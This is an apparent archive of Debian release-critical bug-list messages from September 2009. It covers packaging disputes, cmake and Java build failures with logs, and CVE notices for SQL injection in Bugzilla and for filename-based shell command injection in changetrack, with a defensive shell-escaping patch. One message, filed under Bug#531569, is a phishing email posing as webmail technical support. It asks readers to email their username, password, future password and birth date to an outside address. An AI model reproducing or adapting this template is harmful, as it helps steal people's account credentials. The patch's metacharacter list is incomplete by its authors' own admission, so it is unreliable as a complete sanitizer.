Bug#546862: camstream: depends on extra package (makedev)
Le jeudi 17 septembre 2009 à 03:11 +0200, Julien Cristau a écrit : On Thu, Sep 17, 2009 at 02:39:08 +0200, Martín Ferrari wrote: Xavier, On Wed, Sep 16, 2009 at 10:18, Xavier Bestel xavier.bes...@free.fr wrote: your package depends on makedev which is an extra packages. That's a violation of Debian Policy 2.5: Packages must not depend on packages with lower priority values (excluding build-time dependencies). In order to ensure this, the priorities of one or more packages may need to be adjusted. Thanks for noticing this, I'll see how can I remove the dependency. Moreover, this makes makedev uninstallable and so blocks the sysv-rc conversion to dependency based boot. I don't understand this. How on earth can camstream make makedev uninstallable by depending on it? Ignore the report, camstream depends on udev | makedev, which is just fine. Xavier, a mass bug filing such as this has to be discussed on -devel first, you can't just go and file a pile of severity:serious bugs, especially when 1) the bugs wouldn't be RC even if they were real, and 2) most of them aren't even bugs. Yes, sorry; I've been a bit quick to spam everybody with this report. I have read the policy a bit too literally. Xav -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#544674:
Please apply upstream patch that should solve this grave issue. Link: http://public.kitware.com/cgi-bin/viewcvs.cgi/Modules/FindJNI.cmake?root=CMaker1=1.40r2=1.41 Thanks -- Mathieu -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547132: CVE-2009-3165: SQL injection vulnerability
Package: bugzilla Severity: serious Tags: security -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, the following CVE (Common Vulnerabilities Exposures) id was published for bugzilla. CVE-2009-3165[0]: | SQL injection vulnerability in the Bug.create WebService function in | Bugzilla 2.23.4 through 3.0.8, 3.1.1 through 3.2.4, and 3.3.1 through | 3.4.1 allows remote attackers to execute arbitrary SQL commands via | unspecified parameters. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3165 http://security-tracker.debian.net/tracker/CVE-2009-3165 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkqx3+cACgkQNxpp46476aq31gCeLMfMJuutOzPwP+0uouISHD4/ fjAAn1q/BdldzmPcE/W9vh5Im9h3FoRj =Kbgf -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546791: CVE-2009-3233: shell command injection via filename
retitle 546791 CVE-2009-3233: shell command injection via filename thanks Hi, this issue got a CVE id: Name: CVE-2009-3233 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3233 Reference: MLIST:[oss-security] 20090916 CVE id request: changetrack Reference: URL:http://www.openwall.com/lists/oss-security/2009/09/16/3 Reference: CONFIRM:http://bugs.debian.org/546791 Reference: BID:36420 Reference: URL:http://www.securityfocus.com/bid/36420 Reference: SECUNIA:36756 Reference: URL:http://secunia.com/advisories/36756 changetrack 4.3 allows local users to execute arbitrary commands via CRLF sequences and shell metacharacters in a filename in a directory that is checked by changetrack. Please coordinate with the security team (t...@security.debian.org) to prepare packages for the stable and oldstable releases. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. Cheers, Giuseppe. signature.asc Description: OpenPGP digital signature
Processed: CVE-2009-3233: shell command injection via filename
Processing commands for cont...@bugs.debian.org: retitle 546791 CVE-2009-3233: shell command injection via filename Bug #546791 [changetrack] changetrack: shell command injection via filename Changed Bug title to 'CVE-2009-3233: shell command injection via filename' from 'changetrack: shell command injection via filename' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547137: libmono-addins0.2-cil: Assembly ../libmono-addins0.2-cil/policy.0.2.Mono.Addins.dll does not exist
Package: libmono-addins0.2-cil Version: 0.4-5 Severity: grave Justification: renders package unusable mono-gac is failing to upgrade because of a problem with libmono-addins0.2-cil and libmono-addins-gui0.2-cil: Setting up mono-gac (2.4.2.3+dfsg-1) ... [...] * Installing 1 assembly from libndesk-dbus-glib1.0-cil into Mono ! Assembly /usr/share/cli-common/policies.d/libmono-addins-gui0.2-cil/policy.0.2.Mono.Addins.Gui.dll does not exist ! Assembly /usr/share/cli-common/policies.d/libmono-addins0.2-cil/policy.0.2.Mono.Addins.dll does not exist ! Assembly /usr/share/cli-common/policies.d/libmono-addins0.2-cil/policy.0.2.Mono.Addins.Setup.dll does not exist dpkg: error processing mono-gac (--configure): subprocess installed post-installation script returned error exit status 3 -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages libmono-addins0.2-cil depends on: ii cli-common0.7common files between all CLI packa ii libc6 2.9-25 GNU C Library: Shared libraries ii libmono-corlib2.0-cil 2.4.2.3+dfsg-1 Mono core library (for CLI 2.0) pn libmono-sharpzip2.84-cil none (no description available) pn libmono-system2.0-cil none (no description available) pn mono-runtime none (no description available) libmono-addins0.2-cil recommends no packages. libmono-addins0.2-cil suggests no packages. -- no debconf information -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. vor...@debian.org http://www.debian.org/ -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547137: libmono-addins0.2-cil: Assembly ../libmono-addins0.2-cil/policy.0.2.Mono.Addins.dll does not exist
On Thu, Sep 17, 2009 at 12:36:41AM -0700, Steve Langasek wrote: Package: libmono-addins0.2-cil Version: 0.4-5 Severity: grave Justification: renders package unusable mono-gac is failing to upgrade because of a problem with libmono-addins0.2-cil and libmono-addins-gui0.2-cil: Setting up mono-gac (2.4.2.3+dfsg-1) ... [...] * Installing 1 assembly from libndesk-dbus-glib1.0-cil into Mono ! Assembly /usr/share/cli-common/policies.d/libmono-addins-gui0.2-cil/policy.0.2.Mono.Addins.Gui.dll does not exist ! Assembly /usr/share/cli-common/policies.d/libmono-addins0.2-cil/policy.0.2.Mono.Addins.dll does not exist ! Assembly /usr/share/cli-common/policies.d/libmono-addins0.2-cil/policy.0.2.Mono.Addins.Setup.dll does not exist dpkg: error processing mono-gac (--configure): subprocess installed post-installation script returned error exit status 3 This was caused by orphaned files under /usr/share/cli-common/packages.d: /usr/share/cli-common/packages.d/policy.0.2.Mono.Addins.Setup.installcligac /usr/share/cli-common/packages.d/policy.0.2.Mono.Addins.installcligac /usr/share/cli-common/packages.d/policy.0.2.Mono.Addins.Gui.installcligac $ cat /usr/share/cli-common/packages.d/policy.0.2.Mono.Addins.Gui.installcligac /usr/share/cli-common/policies.d/libmono-addins-gui0.2-cil/policy.0.2.Mono.Addins.Gui.dll $ I don't know where these files came from. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ slanga...@ubuntu.com vor...@debian.org -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546791: changetrack: shell command injection via filename
Jens Peter Secher pisze:
Thanks for the bug report.
I am considering applying the following fix:
if( $realfile =~ m/[\r\n\f`\$]/ ) {
if(!$opt_q)
{ print Skipping non-sane filename '$realfile'\n;}
@diff = (@diff, Non-sane: '$realfile'\n);
next;
}
for outright rejecting weird filenames. Can you come up with other
problematic characters in filenames?
Thanks for reply.
Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs
should be safe to:
His patch:
--- changetrack.orig2009-09-16 17:59:55.0 +0200
+++ changetrack 2009-09-16 18:00:01.0 +0200
@@ -224,6 +224,10 @@
}
$yestfile = $compfile . .yesterday; # stores current data
+ my $yestfile_esc = escape_shell_chars ($yestfile);
+my $realfile_esc = escape_shell_chars ($realfile);
+ my $compfile_esc = escape_shell_chars ($compfile);
+
if( ! -r $yestfile ) { # can't open yesterday, doesn't
exist.
@diff = (@diff, New file $realfile\n);
if($opt_e) {
@@ -243,12 +247,12 @@
printf STAT %o\n%s\n%s\n, $filemode, $fileuid, $filegid;
close(STAT);
if(!$opt_r) {
- `cp $realfile $compfile`;
+ `cp $realfile_esc $compfile_esc`;
chdir($historypath);
- `co $rcs_quiet $compfile`; # hack to make rcs work.
- system(rcs $rcs_quiet -i -t-'this is $realfile' $compfile);
- `rcs $rcs_quiet -U $compfile`;
- `rm $compfile -f`;
+ `co $rcs_quiet $compfile_esc`; # hack to make rcs work.
+ system(rcs $rcs_quiet -i -t-'this is $realfile_esc'
$compfile_esc);
+ `rcs $rcs_quiet -U $compfile_esc`;
+ `rm $compfile_esc -f`;
}
}
@@ -295,7 +299,10 @@
close(STAT);
}
- open(DIFF, diff $diffargs $yestfile $realfile |) or die Exiting:
can't run diff:$!\n;
+ if ($realfile_esc =~ /test/) {
+ print $realfile_esc\n;
+ }
+ open(DIFF, diff $diffargs $yestfile_esc $realfile_esc |) or die
Exiting: can't run diff:$!\n;
if(!$opt_q) {
print $realfile;};
@@ -314,7 +321,7 @@
close(DIFF);
if($diff) {
- open(DIFF, diff -e $yestfile $realfile |) or die Can't do diff
-e:$!\n;
+ open(DIFF, diff -e $yestfile_esc $realfile_esc |) or die Can't
do diff -e:$!\n;
# use -e to create ed commands
while(DIFF) {
@ed = (@ed,$_); # get the 'ed'-styled diffs.
No need to understand them.
@@ -385,12 +392,12 @@
chdir($historypath) or die Can't chdir to $historypath for ci:
$!\n;
my $quiet = ;
print cp $realfile $compfile\n unless defined($opt_q);
- `co $compfile`; # hack to make rcs work here too!
- `cp $realfile $compfile`; # make backup copy
+ `co $compfile_esc`; # hack to make rcs work here too!
+ `cp $realfile_esc $compfile_esc`; # make backup copy
#`mv $realfile $realfile.track`; # copy backwards, to keep
modification date
#`cp $realfile.track $realfile`; # make backup copy
- system(ci $rcs_quiet -m'modification of $realfile on $date' -l
$compfile);
- `rm $compfile`;
+ system(ci $rcs_quiet -m'modification of $realfile_esc on
$date' -l $compfile_esc);
+ `rm $compfile_esc`;
}
}
}
@@ -438,6 +445,16 @@
}
}
+#
+# escape shell meta characters and spaces
+sub escape_shell_chars
+{
+my $arg = shift;
+$arg =~ s/[;\*\|`\$!#\(\)\[\]\{\}:'\s]/\\$/g;
+return $arg;
+}
+
+
# $Log: changetrack,v $
# Revision 4.3 2005/02/28 16:50:23 cjmorlan
# Removed debugging lines!
it's all of them ? We don't know ;)
--
Regards
Marek Grzybowski
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#529872: kaffe: diff for NMU version 2:1.1.8-5.3
On Wed, Sep 16, 2009 at 11:59:53PM +0200, Stefano Zacchiroli wrote: On Wed, Sep 16, 2009 at 11:12:22PM +0200, Michael Koch wrote: Do you have any specific showstopper for filing a removal request RoM right ahead? The only showstopper I can think is that the built kaffe VM might not work. I remember problems when a) gcc and gcj ha different major versions or b) gcc was 4.2 due to stricter aliasing rules. I dont know if these problems still apply. Perhaps it sounded differently but I'm not against the NMU. I just wanted to make the current situation clear. And every fixed RC bug is a good RC bug. Cheers, Michael -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: tagging 545275
Processing commands for cont...@bugs.debian.org: tags 545275 + pending Bug #545275 [gnupg] priority important package depending on optional one. Added tag(s) pending. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#544674:
Modestats, On Thu, Sep 17, 2009 at 12:22 PM, Modestas Vainius modes...@vainius.eu wrote: affects 544674 - vtk severity 544674 important thanks Hello, On ketvirtadienis 17 Rugsėjis 2009 10:05:57 Mathieu Malaterre wrote: Please apply upstream patch that should solve this grave issue. Link: http://public.kitware.com/cgi-bin/viewcvs.cgi/Modules/FindJNI.cmake?root=CM aker1=1.40r2=1.41 Mathieu, my previous arguments about your patch being arch-dependent still hold true. I somehow missed that you reported upstream bug and I would say it is rather unfortunate upstream accepted your patch. So I'm not going to rush but talk with upstream about proper solution. I would think that DD cannot replace whatever choice is being done upstream. Secondly, fixing #544674 bug will NOT fix #545335. Current FindJNI.cmake refers to $JAVA_HOME/ppc in the search path as it is supposed to (according to openjdk-6-jre-headless package). There is no convention AFAIK. So unless you inspect all of them you will *not* find libjawt.so. The actual proper fix in debian would be to have all libjawt.so provider to install the symlinks properly. Don't you find it weird that vtk builds just *fine* with FindJNI.cmake on arches it supposedly does NOT support (according to this bug) but fails on powerpc which it supports properly? This bug obviously attracted too much false attention. No it does not build, see your own remark below. FWIW, from vtk debian/rules: echo JAVA_AWT_LIBRARY:FILEPATH=/usr/lib/jvm/default- java/jre/lib/$(DEB_HOST_ARCH_CPU)/libjawt.so Build/CMakeCache.txt That's just wrong. cmake is doing system inspection. This was written by someone not knowing the cmake enough. So that's where the powerpc FTBFS is coming from. It *overrides* proper value FindJNI sets on powerpc. It is also true that you cannot drop this workaround until #544674 is fixed. You will have to improve it. You missed earlier discussion, I do not know why Maitland push the issue over to you without the full discussion thread. If you look back in the history reverting the change will also break in other way. So in summary: you have to do system inspection because no DEB_*_ARCH / DEB_*_CPU will work on all combination of java package provider for libjawt.so I can understand that you would prefer another solution (I also personnaly do), but for the time being there is no convention for debian package providing libjawt.so and symlinks are not always provided. I'd really see VTK / ITK / Slicer / GDCM being considered for testing for such a small issue that is so deeply burried in cmake internals. cmake will soon be released so this patch will be integrated anyway. -- Mathieu -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#544674:
affects 544674 - vtk severity 544674 important thanks Hello, On ketvirtadienis 17 Rugsėjis 2009 10:05:57 Mathieu Malaterre wrote: Please apply upstream patch that should solve this grave issue. Link: http://public.kitware.com/cgi-bin/viewcvs.cgi/Modules/FindJNI.cmake?root=CM aker1=1.40r2=1.41 Mathieu, my previous arguments about your patch being arch-dependent still hold true. I somehow missed that you reported upstream bug and I would say it is rather unfortunate upstream accepted your patch. So I'm not going to rush but talk with upstream about proper solution. Secondly, fixing #544674 bug will NOT fix #545335. Current FindJNI.cmake refers to $JAVA_HOME/ppc in the search path as it is supposed to (according to openjdk-6-jre-headless package). Don't you find it weird that vtk builds just *fine* with FindJNI.cmake on arches it supposedly does NOT support (according to this bug) but fails on powerpc which it supports properly? This bug obviously attracted too much false attention. FWIW, from vtk debian/rules: echo JAVA_AWT_LIBRARY:FILEPATH=/usr/lib/jvm/default- java/jre/lib/$(DEB_HOST_ARCH_CPU)/libjawt.so Build/CMakeCache.txt So that's where the powerpc FTBFS is coming from. It *overrides* proper value FindJNI sets on powerpc. It is also true that you cannot drop this workaround until #544674 is fixed. You will have to improve it. -- Modestas Vainius modes...@vainius.eu signature.asc Description: This is a digitally signed message part.
Processed: Re: Bug#544674:
Processing commands for cont...@bugs.debian.org: affects 544674 - vtk Bug #544674 [cmake] FindJNI.cmake is missing archs/cpus Removed indication that 544674 affects vtk severity 544674 important Bug #544674 [cmake] FindJNI.cmake is missing archs/cpus Severity set to 'important' from 'grave' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#545335: Bug#544674:
On Thu, Sep 17, 2009 at 12:33 PM, Mathieu Malaterre mathieu.malate...@gmail.com wrote: echo JAVA_AWT_LIBRARY:FILEPATH=/usr/lib/jvm/default- java/jre/lib/$(DEB_HOST_ARCH_CPU)/libjawt.so Build/CMakeCache.txt As a side note here is the output of what is happening without those two lines and using the old FindJNI.cmake: https://buildd.debian.org/~luk/status/package.php?p=gdcm Copied for later reference: gdcm/armel tail of last log: Scanning dependencies of target vtkgdcmJava make[3]: Leaving directory `/build/buildd-gdcm_2.0.12-11-armel-vYWMSv/gdcm-2.0.12/debian/build-python2.5' make[3]: Entering directory `/build/buildd-gdcm_2.0.12-11-armel-vYWMSv/gdcm-2.0.12/debian/build-python2.5' [ 86%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkGDCMTestingJava.cxx.o [ 86%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkGDCMImageReaderJava.cxx.o [ 86%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkGDCMImageWriterJava.cxx.o [ 86%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkGDCMMedicalImagePropertiesJava.cxx.o [ 86%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkGDCMThreadedImageReaderJava.cxx.o [ 87%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkImageColorViewerJava.cxx.o [ 87%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkImageMapToWindowLevelColors2Java.cxx.o [ 87%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkImageYBRToRGBJava.cxx.o [ 87%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkImageRGBToYBRJava.cxx.o [ 88%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkGDCMPolyDataReaderJava.cxx.o [ 88%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkLookupTable16Java.cxx.o [ 88%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkImageMapToColors16Java.cxx.o [ 88%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkGDCMThreadedImageReader2Java.cxx.o make[3]: *** No rule to make target `/usr/lib/jvm/default-java/lib/libjawt.so', needed by `bin/libvtkgdcmJava.so'. Stop. make[3]: Leaving directory `/build/buildd-gdcm_2.0.12-11-armel-vYWMSv/gdcm-2.0.12/debian/build-python2.5' make[2]: *** [Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/all] Error 2 make[2]: Leaving directory `/build/buildd-gdcm_2.0.12-11-armel-vYWMSv/gdcm-2.0.12/debian/build-python2.5' make[1]: *** [all] Error 2 make: *** [debian/build-python2.5-stamp] Error 2 make[1]: Leaving directory `/build/buildd-gdcm_2.0.12-11-armel-vYWMSv/gdcm-2.0.12/debian/build-python2.5' dpkg-buildpackage: error: debian/rules build gave error exit status 2 Build finished at 20090907-1301 FAILED [dpkg-buildpackage died] gdcm/powerpc tail of last log: make[3]: Leaving directory `/build/buildd-gdcm_2.0.12-11-powerpc-i0ZkKj/gdcm-2.0.12/debian/build-python2.5' [ 96%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkGDCMImageWriterPython.cxx.o [ 96%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkGDCMMedicalImagePropertiesPython.cxx.o [ 97%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkGDCMThreadedImageReaderPython.cxx.o [ 97%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkImageColorViewerPython.cxx.o [ 97%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkImageMapToWindowLevelColors2Python.cxx.o [ 97%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkImageYBRToRGBPython.cxx.o [ 98%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkImageRGBToYBRPython.cxx.o [ 98%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkGDCMPolyDataReaderPython.cxx.o [ 98%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkLookupTable16Python.cxx.o [ 98%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkImageMapToColors16Python.cxx.o [ 98%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkGDCMThreadedImageReader2Python.cxx.o [ 99%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmPythonD.dir/vtkgdcmPythonInit.cxx.o Linking CXX shared module ../../bin/libvtkgdcmsharpglue.so make[3]: Leaving directory `/build/buildd-gdcm_2.0.12-11-powerpc-i0ZkKj/gdcm-2.0.12/debian/build-python2.5' [ 99%] Built target vtkgdcmsharpglue Linking CXX shared library ../../bin/libvtkgdcmPythonD.so make[3]: Leaving directory `/build/buildd-gdcm_2.0.12-11-powerpc-i0ZkKj/gdcm-2.0.12/debian/build-python2.5' [ 99%] Built target vtkgdcmPythonD make[2]: Leaving directory `/build/buildd-gdcm_2.0.12-11-powerpc-i0ZkKj/gdcm-2.0.12/debian/build-python2.5' make[1]: *** [all] Error 2 make: *** [debian/build-python2.5-stamp] Error 2 make[1]: Leaving directory `/build/buildd-gdcm_2.0.12-11-powerpc-i0ZkKj/gdcm-2.0.12/debian/build-python2.5' dpkg-buildpackage: error: debian/rules build gave error exit status 2
Bug#545335: Bug#544674:
Because gdcm is build with parallel option the output was garbaged from the 'more' page. Instead it should have read: On Thu, Sep 17, 2009 at 12:39 PM, Mathieu Malaterre mathieu.malate...@gmail.com wrote: gdcm/powerpc tail of last log: gdcm/powerpc tail of last log: make[3]: Entering directory `/build/buildd-gdcm_2.0.12-11-powerpc-i0ZkKj/gdcm-2.0.12/debian/build-python2.5' [ 93%] Python Wrapping - generating vtkgdcmPythonInit.cxx [ 93%] Python Wrapping - generating vtkGDCMTestingPython.cxx [ 93%] Python Wrapping - generating vtkGDCMImageReaderPython.cxx [ 93%] Python Wrapping - generating vtkGDCMImageWriterPython.cxx [ 94%] Python Wrapping - generating vtkGDCMMedicalImagePropertiesPython.cxx [ 94%] Python Wrapping - generating vtkGDCMThreadedImageReaderPython.cxx [ 94%] Python Wrapping - generating vtkImageColorViewerPython.cxx [ 94%] Python Wrapping - generating vtkImageMapToWindowLevelColors2Python.cxx [ 94%] Python Wrapping - generating vtkImageYBRToRGBPython.cxx [ 95%] Python Wrapping - generating vtkImageRGBToYBRPython.cxx [ 95%] Python Wrapping - generating vtkGDCMPolyDataReaderPython.cxx [ 95%] Python Wrapping - generating vtkLookupTable16Python.cxx [ 95%] Python Wrapping - generating vtkImageMapToColors16Python.cxx [ 96%] Python Wrapping - generating vtkGDCMThreadedImageReader2Python.cxx make[3]: *** No rule to make target `/usr/lib/jvm/default-java/jre/lib/powerpc/libjawt.so', needed by `bin/libvtkgdcmJava.so'. Stop. make[3]: *** Waiting for unfinished jobs [ 96%] [ 96%] Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkImageMapToColors16Java.cxx.o Scanning dependencies of target vtkgdcmPythonD Building CXX object Utilities/VTK/CMakeFiles/vtkgdcmJava.dir/vtkGDCMThreadedImageReader2Java.cxx.o make[3]: Leaving directory `/build/buildd-gdcm_2.0.12-11-powerpc-i0ZkKj/gdcm-2.0.12/debian/build-python2.5' Ref: https://buildd.debian.org/fetch.cgi?pkg=gdcmarch=powerpcver=2.0.12-11stamp=1252573316file=logas=raw -- Mathieu -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: your mail
Processing commands for cont...@bugs.debian.org: tags 543804 + pending Bug #543804 [gnome-do-plugins] gnome-do-plugins: please update flickrnet library dependency to libflickrnet2.2-cil Added tag(s) pending. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#543804:
tags 543804 + pending thanks Thanks for your bug. Awaiting upload now. Iain This message has been checked for viruses but the contents of an attachment may still contain software viruses, which could damage your computer system: you are advised to perform your own checks. Email communications with the University of Nottingham may be monitored as permitted by UK legislation. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#545335: Bug#544674:
Hello, On ketvirtadienis 17 Rugsėjis 2009 13:39:46 Mathieu Malaterre wrote: On Thu, Sep 17, 2009 at 12:33 PM, Mathieu Malaterre mathieu.malate...@gmail.com wrote: echo JAVA_AWT_LIBRARY:FILEPATH=/usr/lib/jvm/default- java/jre/lib/$(DEB_HOST_ARCH_CPU)/libjawt.so Build/CMakeCache.txt As a side note here is the output of what is happening without those two lines and using the old FindJNI.cmake: https://buildd.debian.org/~luk/status/package.php?p=gdcm That's not true. Those failures are an example of cmake leaking link interface libraries from vtk (with the help of vtk cmake hackery of course). I grep'ed gcdm sources a bit and I'm 100% sure vtkgdcmJava did not request to be linked with libjawt.so, it probably does not need jawt at all. That jawt link dependency came from libvtk5-dev (/usr/lib/vtk-5.2/VTKLibraryDepends.cmake). So here you also have an explanation why it searches for a weird path on armel and where it came from... We faced this in KDE and rather successfully solved the issue. cmake 2.6 has proper means to fight this linking the whole world together problem with its LINK_INTERFACE_LIBRARIES property and support for IMPORTED targets. So it is time for vtk to properly use those. -- Modestas Vainius modes...@vainius.eu signature.asc Description: This is a digitally signed message part.
Bug#547165: gcj-jre contains nothing (contrary to its description)
Package: gcj-jre Version: 4:4.3.3-9 Severity: grave Justification: renders package unusable The description says: Description: Java runtime environment using GIJ/classpath GIJ is a Java bytecode interpreter, not limited to interpreting bytecode. It includes a class loader which can dynamically load shared objects, so it is possible to give it the name of a class which has been compiled and put into a shared library on the class path. . The package contains as well a collection of wrapper scripts and symlinks. It is meant to provide a Java-RTE-like interface to the GIJ/GCJ tool set. but the package contains nothing: $ dpkg -L gcj-jre /. /usr /usr/share /usr/share/doc /usr/share/doc/gcj-jre -- System Information: Debian Release: squeeze/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26.5-20080922 (SMP w/2 CPU cores; PREEMPT) Locale: LANG=POSIX, LC_CTYPE=en_US.ISO8859-1 (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/bash Versions of packages gcj-jre depends on: ii gcj-jre [java-gcj-compat] 4:4.3.3-9 Java runtime environment using GIJ ii gcj-jre-headless 4:4.3.3-9 Java runtime environment using GIJ ii java-gcj-compat 1.0.80-5.1 Java runtime environment using GIJ ii libgcj-common 1:4.4.0-7 Java runtime library (common files gcj-jre recommends no packages. gcj-jre suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#531569: We are currently upgrading our data base
Dear Account User, We are currently upgrading our data base and e-mail account center i.e homepage view. We shall be deleting old email accounts which are no longer active to create more space for new accounts users.we have also investigated a system wide security audit to improve and enhance our current security. In order to continue using our services you are require to update and re-comfirmed your email account details as requested below. To complete your account re-comfirmation,you must reply to this email immediately and enter your account details as requested below. Username : .. E-mail Login ID.. Password : .. confirm password: Date of Birth :.. Future Password : Failure to do this will immediately render your account deactivated from our database and service will not be interrupted as important messages may as well be lost due to your declining to re-comfirmed your account details to us. You are to send your information above via our webmaster email: accountupgrade...@mail2webmaster.com We apologise for the inconvenience that this will cause you during this period,but trusting that we are here to serve you better and providing more technology which revolves around email and internet. It is also pertinent,you understand that our primary concern is for our customers, and for the security of their files and data. COMFIRMATION CODE: -/93-1A388-480 Webmail Technical Support Team. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Close bugs
Processing commands for cont...@bugs.debian.org: fixed 545653 2.1.8-2 Bug #545653 [udunits] udunits: FTBFS: make: autoreconf: Command not found There is no source info for the package 'udunits' at version '2.1.8-2' with architecture '' Unable to make a source version for version '2.1.8-2' Bug Marked as fixed in versions 2.1.8-2. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547167: Useless as packaged
Package: mojito Version: 0.21.1 Severity: grave As packaged, Mojito is useless. There are no API keys passed to configure, so none of the service implementations are compiled, so Mojito cannot do anything. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#545335: Bug#544674:
